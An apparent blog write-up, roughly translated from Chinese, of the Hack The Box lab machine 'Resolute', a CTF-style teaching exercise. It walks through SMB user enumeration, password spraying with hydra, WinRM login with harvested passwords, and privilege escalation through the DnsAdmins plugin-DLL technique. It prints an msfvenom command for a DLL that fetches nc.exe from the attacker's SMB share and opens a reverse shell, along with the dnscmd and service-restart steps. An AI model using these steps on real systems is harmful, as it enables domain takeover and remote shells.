HTB platform Resolute online target clearance process

If you want to play this online target, you need to register the Hackthebox platform account first. See my previous article for the specific steps Introduction to nanny level registration and use of Hackthebox platform

introduce

Through this penetration, we can learn:

1. Use of rpccline tool

2. Use of enum4linux tools

3. The use of msfvenom tool further exposed veil. The exe file 360 generated by veil has the probability of not reporting poison

4.DnsAdmin user privilege vulnerability

Preliminary preparation

Change the hosts file and scan the ports. Note that this is the nmap fast scanning mode. Some ports may not be scanned. If the ports scanned by fast scanning do not break through

The - p parameter should be used as much as possible. For example, the ports of redis and winrm can't be scanned sometimes. You must use the - p parameter to scan the specified ports

nmap -A resolute > port
root@kali:~/Hackthebox/resolute# cat port 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-14 15:09 CST
Nmap scan report for resolute (10.10.10.169)
Host is up (0.17s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-14 07:17:43Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped

smb (Port 445), winrm (port 5986)

2. Collect information about SMB services and use enum4linux to collect information about SMB servers

-The U parameter enumerates the user list and displays relevant information

For more parameters, see enum4linux -h

root@kali:~# enum4linux -U resolute
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jan 18 18:50:20 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... resolute
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ================================================ 
|    Enumerating Workgroup/Domain on resolute    |
 ================================================ 
[E] Can't find workgroup/domain


 ================================= 
|    Session Check on resolute    |
 ================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server resolute allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name: 

 ======================================= 
|    Getting domain SID for resolute    |
 ======================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: MEGABANK
Domain Sid: S-1-5-21-1392959593-3013219662-3596683436
[+] Host is part of a domain (not a workgroup)

 ========================= 
|    Users on resolute    |
 ========================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail      Name: (null)    Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela       Name: (null)    Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette      Name: (null)    Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika       Name: (null)    Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire       Name: (null)    Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude       Name: (null)    Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null)    Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia      Name: (null)    Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null)    Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo      Name: (null)    Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus       Name: (null)    Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak       Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie      Name: (null)    Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki        Name: (null)    Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo        Name: (null)    Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per  Name: (null)    Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan  Name: Ryan Bertrand     Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally        Name: (null)    Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon        Name: (null)    Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve        Name: (null)    Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie       Name: (null)    Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita       Name: (null)    Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf  Name: (null)    Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null)    Desc: (null)

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
enum4linux complete on Sat Jan 18 18:50:44 2020

One piece of information is very important:

index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak       Desc: Account created. Password set to Welcome123!

Account marko, password Welcome123!, Log in using rpcclient.

rpcclient -U marko resolute

The password entered shows an error.

Get User permissions

1. Use this password to try to log in to other users. There are two methods: manually try or use hydra. The second method is used here.

hydra -L username.txt -p Welcome123! resolute

The password just now is the password of user melanie.

2. After obtaining the account password, try to log in to the SMB server. List the directory first.

root@kali:~/Hackthebox/resolute# smbclient -U melanie -L resolute
Enter WORKGROUP\melanie's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

Use the following command to enter a shared folder of the SMB server.

smbclient -U melanie //resolute/<dirname>

After checking, I didn't find any valuable information.

3. Log in to Winrm (Windows remote management)

You need the tool evil-winrm.rb here. github address

Log in to Winrm

root@kali:~/Hackthebox/tools/evil-winrm# ruby evil-winrm.rb -u melanie -p Welcome123! -i 10.10.10.169

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> cd /Users
*Evil-WinRM* PS C:\Users> ls


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/25/2019  10:43 AM                Administrator
d-----        12/4/2019   2:46 AM                melanie
d-r---       11/20/2016   6:39 PM                Public
d-----        1/18/2020   3:28 AM                ryan

So far, Users permission has been obtained. Note that there is also a user ryan in this directory.

Collect information

1. After obtaining the User permission, we should try to raise the permission. First, we should check the permissions of the current User.

*Evil-WinRM* PS C:\Users\melanie\Desktop> whoami /groups                                                                                                              
                                                                                                                                                                      
GROUP INFORMATION                                                                                                                                                     
-----------------                                                                                                                                                     
                                                                                                                                                                      
Group Name                                 Type             SID          Attributes                                                                                   
========================================== ================ ============ ==================================================                                           
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group                                           
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group                                           
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group                                           
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group                                           
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group                                           
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group                                           
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

The current user permissions are very common.

2. After knowing that the current user does not have any privileges, we should first focus on collecting information. The so-called collecting information is to browse the "suspicious" folders and files.

Make good use of the two parameters of the ls command:

-The force parameter displays all files, including hidden files.

-Hidden shows only hidden files.

*Evil-WinRM* PS C:\> ls -hidden


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        1/17/2020   5:52 PM      402653184 pagefile.sys

Notice that there is a PSTranscripts folder, such as this non system built-in folder, and the file name is very attractive (this example contains the word script). Pay attention to it.

There is a txt document at the bottom of the folder

*Evil-WinRM* PS C:\PSTranscripts\20191203> ls -hidden


    Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

Open it and have a look. It's a log information file. I found important information.

Seems to be the password of ryan user Serv3r4Admin4cc123!

3. Continue to log in using evil winrm. View the permission group to which the user belongs

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group

ryan user belongs to DnsAdmin group, baidu + Google DnsAdmin

Important: DnsAdmin security vulnerability (medium turn)

To put it simply, the DNS administrator (DnsAdmin) has read and write permissions on the DNS server, and can even tell the server to mount our DLL (the original refers to the ServerLevelPluginDll file) without

Verify the mounted path. The commands to mount are:

dnscmd.exe /config /serverlevelplugindll \pathtodll

Right raising

1. After learning from the previous experiments, we are naturally alert to the above description.

Here we need to use msfvenom to automatically generate the dll file of the reverse shell. Before that, complete the following steps:

(1) Download the reverse shell file nc.exe:

netcat official download address (over the wall)

netcat Baidu network disk address (extraction code: 6ksg)

(2) Quick setup of SMB server:

github Download

Run the command python3 setup.py install to install.

Generate a dll file to start the reverse shell. Here, use the windows/x64/exec module custom command to view the required parameters

msf5 payload(windows/x64/exec) > show options

Module options (payload/windows/x64/exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        yes       The command string to execute
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)

Only one CMD parameter is required.

Use the following command to generate custom commands.

msfvenom -p windows/x64/exec CMD='\\10.10.14.32\tools\nc.exe 10.10.14.32 6666 -e cmd.exe' -f dll > reverse.dll

2. Start smb service. There should be nc.exe and reverse.dll under the shared folder, and the folder name must be the file name set in msfvenom, here is tools.

root@kali:~/Hackthebox/resolute/tools# smbserver.py tools ./
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

3. Mount the dll file we have prepared. Because the command is executed remotely, the IP address or host name must be added after dnscmd.exe.

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe resolute /config /serverlevelplugindll \\10.10.14.32\tools\reverse.dll
                                                                                                                                                                      
Registry property serverlevelplugindll successfully reset.                                                                                                            
Command completed successfully.                                                                                                                                       
                                                                                                                                                                      
*Evil-WinRM* PS C:\Users\ryan\Documents>

Restart dns Service

sc.exe \\resolute stop dns
sc.exe \\resolute start dns

Viewing SMB logs

View port listening

The whole infiltration process is over. Obtained system permissions.

reference material

[0] reference article: https://blog.csdn.net/sdihvai/article/details/104031562

[7]github address: https://github.com/Hackplayers/evil-winrm

[9]DnsAdmin security vulnerability (medium turn): https://www.anquanke.com/post/id/86080

[10]netcat official download address (over the wall): https://eternallybored.org/misc/netcat/

[11]netcat Baidu network disk address: https://pan.baidu.com/s/15PkUoZYXHlBoD7LuV36PKQ

[12]github Download: https://github.com/SecureAuthCorp/impacket

Posted on Thu, 25 Nov 2021 19:29:01 -0500 by Eskimo